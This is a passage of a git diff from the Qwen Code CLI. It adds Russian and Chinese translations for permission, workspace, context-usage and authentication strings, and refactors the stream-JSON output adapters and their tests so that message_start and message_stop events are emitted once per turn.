tools.': + 'Qwen Code не может использовать запрещённые инструменты.', + 'Manage trusted directories for this workspace.': + 'Управление доверенными каталогами для этой рабочей области.', + 'Any use of 
the {{tool}} tool': 'Любое использование инструмента {{tool}}', + "{{tool}} commands matching '{{pattern}}'": + "Команды {{tool}}, соответствующие '{{pattern}}'", + 'From user settings': 'Из пользовательских настроек', + 'From project settings': 'Из настроек проекта', + 'From session': 'Из сессии', + 'Project settings (local)': 'Настройки проекта (локальные)', + 'Saved in .qwen/settings.local.json': 'Сохранено в .qwen/settings.local.json', + 'Project settings': 'Настройки проекта', + 'Checked in at .qwen/settings.json': 'Зафиксировано в .qwen/settings.json', + 'User settings': 'Пользовательские настройки', + 'Saved in at ~/.qwen/settings.json': 'Сохранено в ~/.qwen/settings.json', + 'Add a new rule…': 'Добавить новое правило…', + 'Add {{type}} permission rule': 'Добавить правило разрешения {{type}}', + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.': + 'Правила разрешений — это имя инструмента, за которым может следовать спецификатор в скобках.', + 'e.g.,': 'напр.', + or: 'или', + 'Enter permission rule…': 'Введите правило разрешения…', + 'Enter to submit · Esc to cancel': 'Enter для отправки · Esc для отмены', + 'Where should this rule be saved?': 'Где сохранить это правило?', + 'Enter to confirm · Esc to cancel': + 'Enter для подтверждения · Esc для отмены', + 'Delete {{type}} rule?': 'Удалить правило {{type}}?', + 'Are you sure you want to delete this permission rule?': + 'Вы уверены, что хотите удалить это правило разрешения?', + 'Permissions:': 'Разрешения:', + '(←/→ or tab to cycle)': '(←/→ или Tab для переключения)', + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel': + '↑↓ навигация · Enter выбор · Ввод для поиска · Esc отмена', + 'Search…': 'Поиск…', + 'Use /trust to manage folder trust settings for this workspace.': + 'Используйте /trust для управления настройками доверия к папкам этой рабочей области.', + // Workspace directory management + 'Add directory…': 'Добавить каталог…', + 'Add 
directory to workspace': 'Добавить каталог в рабочую область', + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.': + 'Qwen Code может читать файлы в рабочей области и вносить правки, когда автоприём правок включён.', + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.': + 'Qwen Code сможет читать файлы в этом каталоге и вносить правки, когда автоприём правок включён.', + 'Enter the path to the directory:': 'Введите путь к каталогу:', + 'Enter directory path…': 'Введите путь к каталогу…', + 'Tab to complete · Enter to add · Esc to cancel': + 'Tab для завершения · Enter для добавления · Esc для отмены', + 'Remove directory?': 'Удалить каталог?', + 'Are you sure you want to remove this directory from the workspace?': + 'Вы уверены, что хотите удалить этот каталог из рабочей области?', + ' (Original working directory)': ' (Исходный рабочий каталог)', + ' (from settings)': ' (из настроек)', + 'Directory does not exist.': 'Каталог не существует.', + 'Path is not a directory.': 'Путь не является каталогом.', + 'This directory is already in the workspace.': + 'Этот каталог уже есть в рабочей области.', + 'Already covered by existing directory: {{dir}}': + 'Уже охвачен существующим каталогом: {{dir}}', // ============================================================================ // Строка состояния @@ -1519,6 +1623,32 @@ export default { 'Успешная аутентификация с {{region}}. API-ключ и конфигурации моделей сохранены в settings.json (резервная копия создана).', // ============================================================================ + // Context Usage Component + // ============================================================================ + 'Context Usage': 'Использование контекста', + 'No API response yet. Send a message to see actual usage.': + 'Пока нет ответа от API. 
Отправьте сообщение, чтобы увидеть фактическое использование.', + 'Estimated pre-conversation overhead': + 'Оценочные накладные расходы перед беседой', + 'Context window': 'Контекстное окно', + tokens: 'токенов', + Used: 'Использовано', + Free: 'Свободно', + 'Autocompact buffer': 'Буфер автоупаковки', + 'Usage by category': 'Использование по категориям', + 'System prompt': 'Системная подсказка', + 'Built-in tools': 'Встроенные инструменты', + 'MCP tools': 'Инструменты MCP', + 'Memory files': 'Файлы памяти', + Skills: 'Навыки', + Messages: 'Сообщения', + 'Show context window usage breakdown.': + 'Показать разбивку использования контекстного окна.', + 'Run /context detail for per-item breakdown.': + 'Выполните /context detail для детализации по элементам.', + active: 'активно', + 'body loaded': 'содержимое загружено', + memory: 'память', // MCP Management Dialog // ============================================================================ 'MCP Management': 'Управление MCP', @@ -1628,4 +1758,77 @@ export default { '↑/↓: Навигация | Space/Enter: Переключить | Esc: Отмена', '↑/↓: Navigate | Enter: Select | Esc: Cancel': '↑/↓: Навигация | Enter: Выбор | Esc: Отмена', + + // ============================================================================ + // Commands - Auth + // ============================================================================ + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan': + 'Настроить аутентификацию Qwen через Qwen-OAuth или Alibaba Cloud Coding Plan', + 'Authenticate using Qwen OAuth': 'Аутентификация через Qwen OAuth', + 'Authenticate using Alibaba Cloud Coding Plan': + 'Аутентификация через Alibaba Cloud Coding Plan', + 'Region for Coding Plan (china/global)': + 'Регион для Coding Plan (china/global)', + 'API key for Coding Plan': 'API-ключ для Coding Plan', + 'Show current authentication status': + 'Показать текущий статус аутентификации', + 'Authentication completed successfully.': 
'Аутентификация успешно завершена.', + 'Starting Qwen OAuth authentication...': + 'Запуск аутентификации Qwen OAuth...', + 'Successfully authenticated with Qwen OAuth.': + 'Успешная аутентификация через Qwen OAuth.', + 'Failed to authenticate with Qwen OAuth: {{error}}': + 'Ошибка аутентификации через Qwen OAuth: {{error}}', + 'Processing Alibaba Cloud Coding Plan authentication...': + 'Обработка аутентификации Alibaba Cloud Coding Plan...', + 'Successfully authenticated with Alibaba Cloud Coding Plan.': + 'Успешная аутентификация через Alibaba Cloud Coding Plan.', + 'Failed to authenticate with Coding Plan: {{error}}': + 'Ошибка аутентификации через Coding Plan: {{error}}', + '中国 (China)': '中国 (China)', + '阿里云百炼 (aliyun.com)': '阿里云百炼 (aliyun.com)', + Global: 'Глобальный', + 'Alibaba Cloud (alibabacloud.com)': 'Alibaba Cloud (alibabacloud.com)', + 'Select region for Coding Plan:': 'Выберите регион для Coding Plan:', + 'Enter your Coding Plan API key: ': 'Введите ваш API-ключ Coding Plan: ', + 'Select authentication method:': 'Выберите метод аутентификации:', + '\n=== Authentication Status ===\n': '\n=== Статус аутентификации ===\n', + '⚠️ No authentication method configured.\n': + '⚠️ Метод аутентификации не настроен.\n', + 'Run one of the following commands to get started:\n': + 'Выполните одну из следующих команд для начала:\n', + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)': + ' qwen auth qwen-oauth - Аутентификация через Qwen OAuth (бесплатно)', + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n': + ' qwen auth coding-plan - Аутентификация через Alibaba Cloud Coding Plan\n', + 'Or simply run:': 'Или просто выполните:', + ' qwen auth - Interactive authentication setup\n': + ' qwen auth - Интерактивная настройка аутентификации\n', + '✓ Authentication Method: Qwen OAuth': '✓ Метод аутентификации: Qwen OAuth', + ' Type: Free tier': ' Тип: Бесплатный', + ' Limit: Up to 1,000 requests/day': ' Лимит: До 1 000 
запросов/день', + ' Models: Qwen latest models\n': ' Модели: Последние модели Qwen\n', + '✓ Authentication Method: Alibaba Cloud Coding Plan': + '✓ Метод аутентификации: Alibaba Cloud Coding Plan', + '中国 (China) - 阿里云百炼': '中国 (China) - 阿里云百炼', + 'Global - Alibaba Cloud': 'Глобальный - Alibaba Cloud', + ' Region: {{region}}': ' Регион: {{region}}', + ' Current Model: {{model}}': ' Текущая модель: {{model}}', + ' Config Version: {{version}}': ' Версия конфигурации: {{version}}', + ' Status: API key configured\n': ' Статус: API-ключ настроен\n', + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)': + '⚠️ Метод аутентификации: Alibaba Cloud Coding Plan (Не завершён)', + ' Issue: API key not found in environment or settings\n': + ' Проблема: API-ключ не найден в окружении или настройках\n', + ' Run `qwen auth coding-plan` to re-configure.\n': + ' Выполните `qwen auth coding-plan` для повторной настройки.\n', + '✓ Authentication Method: {{type}}': '✓ Метод аутентификации: {{type}}', + ' Status: Configured\n': ' Статус: Настроено\n', + 'Failed to check authentication status: {{error}}': + 'Не удалось проверить статус аутентификации: {{error}}', + 'Select an option:': 'Выберите вариант:', + 'Raw mode not available. Please run in an interactive terminal.': + 'Raw-режим недоступен. Пожалуйста, запустите в интерактивном терминале.', + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n': + '(↑ ↓ стрелки для навигации, Enter для выбора, Ctrl+C для выхода)\n', }; diff --git a/packages/cli/src/i18n/locales/zh.js b/packages/cli/src/i18n/locales/zh.js index b1086a72d..d22fe9b26 100644 --- a/packages/cli/src/i18n/locales/zh.js +++ b/packages/cli/src/i18n/locales/zh.js @@ -116,6 +116,7 @@ export default { '分析项目并创建定制的 QWEN.md 文件', 'List available Qwen Code tools. 
Usage: /tools [desc]': '列出可用的 Qwen Code 工具。用法:/tools [desc]', + 'List available skills.': '列出可用技能。', 'Available Qwen Code CLI tools:': '可用的 Qwen Code CLI 工具:', 'No tools available': '没有可用工具', 'View or change the approval mode for tool usage': @@ -437,6 +438,7 @@ export default { '当前支持以下编辑器。请注意,某些编辑器无法在沙箱模式下使用。', 'Your preferred editor is:': '您的首选编辑器是:', 'Manage extensions': '管理扩展', + 'Manage installed extensions': '管理已安装的扩展', 'List active extensions': '列出活动扩展', 'Update extensions. Usage: update |--all': '更新扩展。用法:update |--all', @@ -623,6 +625,37 @@ export default { 'Failed to configure {{terminalName}}.': '配置 {{terminalName}} 失败。', 'Your terminal is already configured for an optimal experience with multiline input (Shift+Enter and Ctrl+Enter).': '您的终端已配置为支持多行输入(Shift+Enter 和 Ctrl+Enter)的最佳体验。', + // ============================================================================ + // Commands - Hooks + // ============================================================================ + 'Manage Qwen Code hooks': '管理 Qwen Code Hook', + 'List all configured hooks': '列出所有已配置的 Hook', + 'Enable a disabled hook': '启用已禁用的 Hook', + 'Disable an active hook': '禁用已启用的 Hook', + + // ============================================================================ + // Commands - Session Export + // ============================================================================ + 'Export current session message history to a file': + '将当前会话的消息记录导出到文件', + 'Export session to HTML format': '将会话导出为 HTML 文件', + 'Export session to JSON format': '将会话导出为 JSON 文件', + 'Export session to JSONL format (one message per line)': + '将会话导出为 JSONL 文件(每行一条消息)', + 'Export session to markdown format': '将会话导出为 Markdown 文件', + + // ============================================================================ + // Commands - Insights + // ============================================================================ + 'generate personalized programming insights from your chat history': + '根据你的聊天记录生成个性化编程洞察', + + // 
============================================================================ + // Commands - Session History + // ============================================================================ + 'Resume a previous session': '恢复先前会话', + 'Restore a tool call. This will reset the conversation and file history to the state it was in when the tool call was suggested': + '恢复某次工具调用。这将把对话与文件历史重置到提出该工具调用建议时的状态', 'Could not detect terminal type. Supported terminals: VS Code, Cursor, Windsurf, and Trae.': '无法检测终端类型。支持的终端:VS Code、Cursor、Windsurf 和 Trae。', 'Terminal "{{terminal}}" is not supported yet.': @@ -1010,6 +1043,8 @@ export default { 'No, suggest changes (esc)': '否,建议更改 (esc)', "Allow execution of: '{{command}}'?": "允许执行:'{{command}}'?", 'Yes, allow always ...': '是,总是允许 ...', + 'Always allow in this project': '在本项目中总是允许', + 'Always allow for this user': '对该用户总是允许', 'Yes, and auto-accept edits': '是,并自动接受编辑', 'Yes, and manually approve edits': '是,并手动批准编辑', 'No, keep planning (esc)': '否,继续规划 (esc)', @@ -1163,6 +1198,71 @@ export default { // Dialogs - Permissions // ============================================================================ 'Manage folder trust settings': '管理文件夹信任设置', + 'Manage permission rules': '管理权限规则', + Allow: '允许', + Ask: '询问', + Deny: '拒绝', + Workspace: '工作区', + "Qwen Code won't ask before using allowed tools.": + 'Qwen Code 使用已允许的工具前不会询问。', + 'Qwen Code will ask before using these tools.': + 'Qwen Code 使用这些工具前会先询问。', + 'Qwen Code is not allowed to use denied tools.': + 'Qwen Code 不允许使用被拒绝的工具。', + 'Manage trusted directories for this workspace.': + '管理此工作区的受信任目录。', + 'Any use of the {{tool}} tool': '{{tool}} 工具的任何使用', + "{{tool}} commands matching '{{pattern}}'": + "匹配 '{{pattern}}' 的 {{tool}} 命令", + 'From user settings': '来自用户设置', + 'From project settings': '来自项目设置', + 'From session': '来自会话', + 'Project settings (local)': '项目设置(本地)', + 'Saved in .qwen/settings.local.json': '保存在 .qwen/settings.local.json', + 'Project settings': '项目设置', + 'Checked in 
at .qwen/settings.json': '保存在 .qwen/settings.json', + 'User settings': '用户设置', + 'Saved in at ~/.qwen/settings.json': '保存在 ~/.qwen/settings.json', + 'Add a new rule…': '添加新规则…', + 'Add {{type}} permission rule': '添加{{type}}权限规则', + 'Permission rules are a tool name, optionally followed by a specifier in parentheses.': + '权限规则是一个工具名称,可选地后跟括号中的限定符。', + 'e.g.,': '例如', + or: '或', + 'Enter permission rule…': '输入权限规则…', + 'Enter to submit · Esc to cancel': '回车提交 · Esc 取消', + 'Where should this rule be saved?': '此规则应保存在哪里?', + 'Enter to confirm · Esc to cancel': '回车确认 · Esc 取消', + 'Delete {{type}} rule?': '删除{{type}}规则?', + 'Are you sure you want to delete this permission rule?': + '确定要删除此权限规则吗?', + 'Permissions:': '权限:', + '(←/→ or tab to cycle)': '(←/→ 或 tab 切换)', + 'Press ↑↓ to navigate · Enter to select · Type to search · Esc to cancel': + '按 ↑↓ 导航 · 回车选择 · 输入搜索 · Esc 取消', + 'Search…': '搜索…', + 'Use /trust to manage folder trust settings for this workspace.': + '使用 /trust 管理此工作区的文件夹信任设置。', + // Workspace directory management + 'Add directory…': '添加目录…', + 'Add directory to workspace': '添加工作区目录', + 'Qwen Code can read files in the workspace, and make edits when auto-accept edits is on.': + 'Qwen Code 可以读取工作区中的文件,并在自动接受编辑模式开启时进行编辑。', + 'Qwen Code will be able to read files in this directory and make edits when auto-accept edits is on.': + 'Qwen Code 将能够读取此目录中的文件,并在自动接受编辑模式开启时进行编辑。', + 'Enter the path to the directory:': '输入目录路径:', + 'Enter directory path…': '输入目录路径…', + 'Tab to complete · Enter to add · Esc to cancel': + 'Tab 补全 · 回车添加 · Esc 取消', + 'Remove directory?': '删除目录?', + 'Are you sure you want to remove this directory from the workspace?': + '确定要将此目录从工作区中移除吗?', + ' (Original working directory)': ' (原始工作目录)', + ' (from settings)': ' (来自设置)', + 'Directory does not exist.': '目录不存在。', + 'Path is not a directory.': '路径不是目录。', + 'This directory is already in the workspace.': '此目录已在工作区中。', + 'Already covered by existing directory: {{dir}}': '已被现有目录覆盖:{{dir}}', // 
============================================================================ // Status Bar @@ -1463,6 +1563,33 @@ export default { '{{region}} 有新的模型配置可用。是否立即更新?', '{{region}} configuration updated successfully. Model switched to "{{model}}".': '{{region}} 配置更新成功。模型已切换至 "{{model}}"。', + 'Authenticated successfully with {{region}}. API key and model configs saved to settings.json (backed up).': + '成功通过 {{region}} 认证。API Key 和模型配置已保存至 settings.json(已备份)。', + + // ============================================================================ + // Context Usage + // ============================================================================ + 'Context Usage': '上下文使用情况', + 'Context window': '上下文窗口', + Used: '已用', + Free: '空闲', + 'Autocompact buffer': '自动压缩缓冲区', + 'Usage by category': '分类用量', + 'System prompt': '系统提示', + 'Built-in tools': '内置工具', + 'MCP tools': 'MCP 工具', + 'Memory files': '记忆文件', + Skills: '技能', + Messages: '消息', + tokens: 'tokens', + 'Estimated pre-conversation overhead': '预估对话前开销', + 'No API response yet. Send a message to see actual usage.': + '暂无 API 响应。发送消息以查看实际使用情况。', + 'Show context window usage breakdown.': '显示上下文窗口使用情况分解。', + 'Run /context detail for per-item breakdown.': + '运行 /context detail 查看详细分解。', + 'body loaded': '内容已加载', + memory: '记忆', '{{region}} configuration updated successfully.': '{{region}} 配置更新成功。', 'Authenticated successfully with {{region}}. 
API key and model configs saved to settings.json.': '成功通过 {{region}} 认证。API Key 和模型配置已保存至 settings.json。', @@ -1493,4 +1620,72 @@ export default { '↑/↓: 导航 | Space/Enter: 切换 | Esc: 取消', '↑/↓: Navigate | Enter: Select | Esc: Cancel': '↑/↓: 导航 | Enter: 选择 | Esc: 取消', + + // ============================================================================ + // Commands - Auth + // ============================================================================ + 'Configure Qwen authentication information with Qwen-OAuth or Alibaba Cloud Coding Plan': + '使用 Qwen OAuth 或阿里云百炼 Coding Plan 配置 Qwen 认证信息', + 'Authenticate using Qwen OAuth': '使用 Qwen OAuth 进行认证', + 'Authenticate using Alibaba Cloud Coding Plan': + '使用阿里云百炼 Coding Plan 进行认证', + 'Region for Coding Plan (china/global)': 'Coding Plan 区域 (china/global)', + 'API key for Coding Plan': 'Coding Plan 的 API 密钥', + 'Show current authentication status': '显示当前认证状态', + 'Authentication completed successfully.': '认证完成。', + 'Starting Qwen OAuth authentication...': '正在启动 Qwen OAuth 认证...', + 'Successfully authenticated with Qwen OAuth.': '已成功通过 Qwen OAuth 认证。', + 'Failed to authenticate with Qwen OAuth: {{error}}': + 'Qwen OAuth 认证失败:{{error}}', + 'Processing Alibaba Cloud Coding Plan authentication...': + '正在处理阿里云百炼 Coding Plan 认证...', + 'Successfully authenticated with Alibaba Cloud Coding Plan.': + '已成功通过阿里云百炼 Coding Plan 认证。', + 'Failed to authenticate with Coding Plan: {{error}}': + 'Coding Plan 认证失败:{{error}}', + '中国 (China)': '中国 (China)', + '阿里云百炼 (aliyun.com)': '阿里云百炼 (aliyun.com)', + Global: '全球', + 'Alibaba Cloud (alibabacloud.com)': 'Alibaba Cloud (alibabacloud.com)', + 'Select region for Coding Plan:': '选择 Coding Plan 区域:', + 'Enter your Coding Plan API key: ': '请输入您的 Coding Plan API 密钥:', + 'Select authentication method:': '选择认证方式:', + '\n=== Authentication Status ===\n': '\n=== 认证状态 ===\n', + '⚠️ No authentication method configured.\n': '⚠️ 未配置认证方式。\n', + 'Run one of the following commands to get started:\n': + 
'运行以下命令之一开始配置:\n', + ' qwen auth qwen-oauth - Authenticate with Qwen OAuth (free tier)': + ' qwen auth qwen-oauth - 使用 Qwen OAuth 认证(免费)', + ' qwen auth coding-plan - Authenticate with Alibaba Cloud Coding Plan\n': + ' qwen auth coding-plan - 使用阿里云百炼 Coding Plan 认证\n', + 'Or simply run:': '或者直接运行:', + ' qwen auth - Interactive authentication setup\n': + ' qwen auth - 交互式认证配置\n', + '✓ Authentication Method: Qwen OAuth': '✓ 认证方式:Qwen OAuth', + ' Type: Free tier': ' 类型:免费版', + ' Limit: Up to 1,000 requests/day': ' 限额:每天最多 1,000 次请求', + ' Models: Qwen latest models\n': ' 模型:Qwen 最新模型\n', + '✓ Authentication Method: Alibaba Cloud Coding Plan': + '✓ 认证方式:阿里云百炼 Coding Plan', + '中国 (China) - 阿里云百炼': '中国 (China) - 阿里云百炼', + 'Global - Alibaba Cloud': '全球 - Alibaba Cloud', + ' Region: {{region}}': ' 区域:{{region}}', + ' Current Model: {{model}}': ' 当前模型:{{model}}', + ' Config Version: {{version}}': ' 配置版本:{{version}}', + ' Status: API key configured\n': ' 状态:API 密钥已配置\n', + '⚠️ Authentication Method: Alibaba Cloud Coding Plan (Incomplete)': + '⚠️ 认证方式:阿里云百炼 Coding Plan(不完整)', + ' Issue: API key not found in environment or settings\n': + ' 问题:在环境变量或设置中未找到 API 密钥\n', + ' Run `qwen auth coding-plan` to re-configure.\n': + ' 运行 `qwen auth coding-plan` 重新配置。\n', + '✓ Authentication Method: {{type}}': '✓ 认证方式:{{type}}', + ' Status: Configured\n': ' 状态:已配置\n', + 'Failed to check authentication status: {{error}}': + '检查认证状态失败:{{error}}', + 'Select an option:': '请选择:', + 'Raw mode not available. 
Please run in an interactive terminal.': + '原始模式不可用。请在交互式终端中运行。', + '(Use ↑ ↓ arrows to navigate, Enter to select, Ctrl+C to exit)\n': + '(使用 ↑ ↓ 箭头导航,Enter 选择,Ctrl+C 退出)\n', }; diff --git a/packages/cli/src/nonInteractive/io/BaseJsonOutputAdapter.ts b/packages/cli/src/nonInteractive/io/BaseJsonOutputAdapter.ts index b0d6736a5..dc62f9ae2 100644 --- a/packages/cli/src/nonInteractive/io/BaseJsonOutputAdapter.ts +++ b/packages/cli/src/nonInteractive/io/BaseJsonOutputAdapter.ts @@ -282,12 +282,12 @@ export abstract class BaseJsonOutputAdapter { return; } - if (lastBlock.type === 'text') { - const index = state.blocks.length - 1; - this.onBlockClosed(state, index, actualParentToolUseId); - this.closeBlock(state, index); - } else if (lastBlock.type === 'thinking') { - const index = state.blocks.length - 1; + const index = state.blocks.length - 1; + if (!state.openBlocks.has(index)) { + return; + } + + if (lastBlock.type === 'text' || lastBlock.type === 'thinking') { this.onBlockClosed(state, index, actualParentToolUseId); this.closeBlock(state, index); } @@ -392,7 +392,9 @@ export abstract class BaseJsonOutputAdapter { } const message = this.buildMessage(parentToolUseId); - this.emitMessageImpl(message); + if (state.messageStarted) { + this.emitMessageImpl(message); + } return message; } @@ -656,12 +658,7 @@ export abstract class BaseJsonOutputAdapter { parentToolUseId: string, ): CLIAssistantMessage { const state = this.getMessageState(parentToolUseId); - const message = this.finalizeAssistantMessageInternal( - state, - parentToolUseId, - ); - this.updateLastAssistantMessage(message); - return message; + return this.finalizeAssistantMessageInternal(state, parentToolUseId); } /** diff --git a/packages/cli/src/nonInteractive/io/JsonOutputAdapter.ts b/packages/cli/src/nonInteractive/io/JsonOutputAdapter.ts index a76de53a8..68633675b 100644 --- a/packages/cli/src/nonInteractive/io/JsonOutputAdapter.ts +++ b/packages/cli/src/nonInteractive/io/JsonOutputAdapter.ts @@ -52,12 
+52,10 @@ export class JsonOutputAdapter } finalizeAssistantMessage(): CLIAssistantMessage { - const message = this.finalizeAssistantMessageInternal( + return this.finalizeAssistantMessageInternal( this.mainAgentMessageState, null, ); - this.updateLastAssistantMessage(message); - return message; } emitResult(options: ResultOptions): void { diff --git a/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.test.ts b/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.test.ts index 96977d5b0..64448c8a6 100644 --- a/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.test.ts +++ b/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.test.ts @@ -654,6 +654,24 @@ describe('StreamJsonOutputAdapter', () => { 'Message not started', ); }); + + it('should not emit empty assistant message when started but no content processed', () => { + stdoutWriteSpy.mockClear(); + adapter.finalizeAssistantMessage(); + + const assistantCalls = stdoutWriteSpy.mock.calls.filter( + (call: unknown[]) => { + try { + const parsed = JSON.parse(call[0] as string); + return parsed.type === 'assistant'; + } catch { + return false; + } + }, + ); + + expect(assistantCalls).toHaveLength(0); + }); }); describe('emitResult', () => { @@ -1007,56 +1025,68 @@ describe('StreamJsonOutputAdapter', () => { }); }); - describe('message_id in stream events', () => { + describe('content_block event identification', () => { beforeEach(() => { adapter = new StreamJsonOutputAdapter(mockConfig, true); adapter.startAssistantMessage(); }); - it('should include message_id in stream events after message starts', () => { + it('should not include message_id in content_block events', () => { adapter.processEvent({ type: GeminiEventType.Content, value: 'Text', }); - // Process another event to ensure messageStarted is true adapter.processEvent({ type: GeminiEventType.Content, value: 'More', }); const calls = stdoutWriteSpy.mock.calls; - // Find all delta events - const deltaCalls = calls.filter((call: 
unknown[]) => { + const contentBlockCalls = calls.filter((call: unknown[]) => { try { const parsed = JSON.parse(call[0] as string); return ( parsed.type === 'stream_event' && - parsed.event.type === 'content_block_delta' + (parsed.event.type === 'content_block_start' || + parsed.event.type === 'content_block_delta' || + parsed.event.type === 'content_block_stop') ); } catch { return false; } }); - expect(deltaCalls.length).toBeGreaterThan(0); - // The second delta event should have message_id (after messageStarted becomes true) - // message_id is added to the event object, so check parsed.event.message_id - if (deltaCalls.length > 1) { - const secondDelta = JSON.parse( - (deltaCalls[1] as unknown[])[0] as string, - ); - // message_id is on the enriched event object - expect( - secondDelta.event.message_id || secondDelta.message_id, - ).toBeTruthy(); - } else { - // If only one delta, check if message_id exists - const delta = JSON.parse((deltaCalls[0] as unknown[])[0] as string); - // message_id is added when messageStarted is true - // First event may or may not have it, but subsequent ones should - expect(delta.event.message_id || delta.message_id).toBeTruthy(); + expect(contentBlockCalls.length).toBeGreaterThan(0); + for (const call of contentBlockCalls) { + const parsed = JSON.parse((call as unknown[])[0] as string); + expect(parsed.event.message_id).toBeUndefined(); } }); + + it('should identify content_block events by session_id and index', () => { + adapter.processEvent({ + type: GeminiEventType.Content, + value: 'Text', + }); + + const calls = stdoutWriteSpy.mock.calls; + const blockStartCall = calls.find((call: unknown[]) => { + try { + const parsed = JSON.parse(call[0] as string); + return ( + parsed.type === 'stream_event' && + parsed.event.type === 'content_block_start' + ); + } catch { + return false; + } + }); + + expect(blockStartCall).toBeDefined(); + const parsed = JSON.parse((blockStartCall as unknown[])[0] as string); + 
expect(parsed.session_id).toBe('test-session-id'); + expect(typeof parsed.event.index).toBe('number'); + }); }); describe('multiple text blocks', () => { diff --git a/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.ts b/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.ts index bf76d025c..c67190e6a 100644 --- a/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.ts +++ b/packages/cli/src/nonInteractive/io/StreamJsonOutputAdapter.ts @@ -36,6 +36,8 @@ export class StreamJsonOutputAdapter extends BaseJsonOutputAdapter implements JsonOutputAdapterInterface { + private mainTurnMessageStartEmitted = false; + constructor( config: Config, private readonly includePartialMessages: boolean, @@ -68,29 +70,27 @@ export class StreamJsonOutputAdapter return this.includePartialMessages; } + override startAssistantMessage(): void { + this.mainTurnMessageStartEmitted = false; + super.startAssistantMessage(); + } + finalizeAssistantMessage(): CLIAssistantMessage { - const state = this.mainAgentMessageState; - if (state.finalized) { - return this.buildMessage(null); - } - state.finalized = true; - - this.finalizePendingBlocks(state, null); - const orderedOpenBlocks = Array.from(state.openBlocks).sort( - (a, b) => a - b, + const message = this.finalizeAssistantMessageInternal( + this.mainAgentMessageState, + null, ); - for (const index of orderedOpenBlocks) { - this.onBlockClosed(state, index, null); - this.closeBlock(state, index); + if (this.mainTurnMessageStartEmitted && this.includePartialMessages) { + const partial: CLIPartialAssistantMessage = { + type: 'stream_event', + uuid: randomUUID(), + session_id: this.getSessionId(), + parent_tool_use_id: null, + event: { type: 'message_stop' }, + }; + this.emitMessageImpl(partial); } - - if (state.messageStarted && this.includePartialMessages) { - this.emitStreamEventIfEnabled({ type: 'message_stop' }, null); - } - - const message = this.buildMessage(null); - this.updateLastAssistantMessage(message); - 
this.emitMessageImpl(message); + this.mainTurnMessageStartEmitted = false; return message; } @@ -249,14 +249,15 @@ export class StreamJsonOutputAdapter /** * Overrides base class hook to emit message_start event when message is started. - * Only emits for main agent, not for subagents. + * Only emits once per turn for the main agent (guarded by mainTurnMessageStartEmitted), + * so block-type transitions inside a single turn do not produce spurious message_start events. */ protected override onEnsureMessageStarted( state: MessageState, parentToolUseId: string | null, ): void { - // Only emit message_start for main agent, not for subagents - if (parentToolUseId === null) { + if (parentToolUseId === null && !this.mainTurnMessageStartEmitted) { + this.mainTurnMessageStartEmitted = true; this.emitStreamEventIfEnabled( { type: 'message_start', @@ -264,6 +265,7 @@ export class StreamJsonOutputAdapter id: state.messageId!, role: 'assistant', model: this.config.getModel(), + content: [], }, }, null, @@ -311,19 +313,12 @@ export class StreamJsonOutputAdapter return; } - const state = this.getMessageState(parentToolUseId); - const enrichedEvent = state.messageStarted - ? 
({ ...event, message_id: state.messageId } as StreamEvent & { - message_id: string; - }) - : event; - const partial: CLIPartialAssistantMessage = { type: 'stream_event', uuid: randomUUID(), session_id: this.getSessionId(), parent_tool_use_id: parentToolUseId, - event: enrichedEvent, + event, }; this.emitMessageImpl(partial); } diff --git a/packages/cli/src/nonInteractive/types.ts b/packages/cli/src/nonInteractive/types.ts index 84c2d0ff7..69eaa1dcd 100644 --- a/packages/cli/src/nonInteractive/types.ts +++ b/packages/cli/src/nonInteractive/types.ts @@ -201,6 +201,7 @@ export interface MessageStartStreamEvent { id: string; role: 'assistant'; model: string; + content: []; }; } diff --git a/packages/cli/src/nonInteractiveCli.test.ts b/packages/cli/src/nonInteractiveCli.test.ts index 6a6b33b87..af3c93113 100644 --- a/packages/cli/src/nonInteractiveCli.test.ts +++ b/packages/cli/src/nonInteractiveCli.test.ts @@ -20,6 +20,7 @@ import { uiTelemetryService, FatalInputError, ApprovalMode, + SendMessageType, } from '@qwen-code/qwen-code-core'; import type { Part } from '@google/genai'; import { runNonInteractive } from './nonInteractiveCli.js'; @@ -250,7 +251,7 @@ describe('runNonInteractive', () => { [{ text: 'Test input' }], expect.any(AbortSignal), 'prompt-id-1', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); expect(processStdoutSpy).toHaveBeenCalledWith('Hello World'); expect(mockShutdownTelemetry).toHaveBeenCalled(); @@ -300,21 +301,21 @@ describe('runNonInteractive', () => { outputUpdateHandler: expect.any(Function), }), ); - // Verify first call has isContinuation: false + // Verify first call has type: UserQuery expect(mockGeminiClient.sendMessageStream).toHaveBeenNthCalledWith( 1, [{ text: 'Use a tool' }], expect.any(AbortSignal), 'prompt-id-2', - { isContinuation: false }, + { type: SendMessageType.UserQuery }, ); - // Verify second call (after tool execution) has isContinuation: true + // Verify second call (after tool execution) has type: 
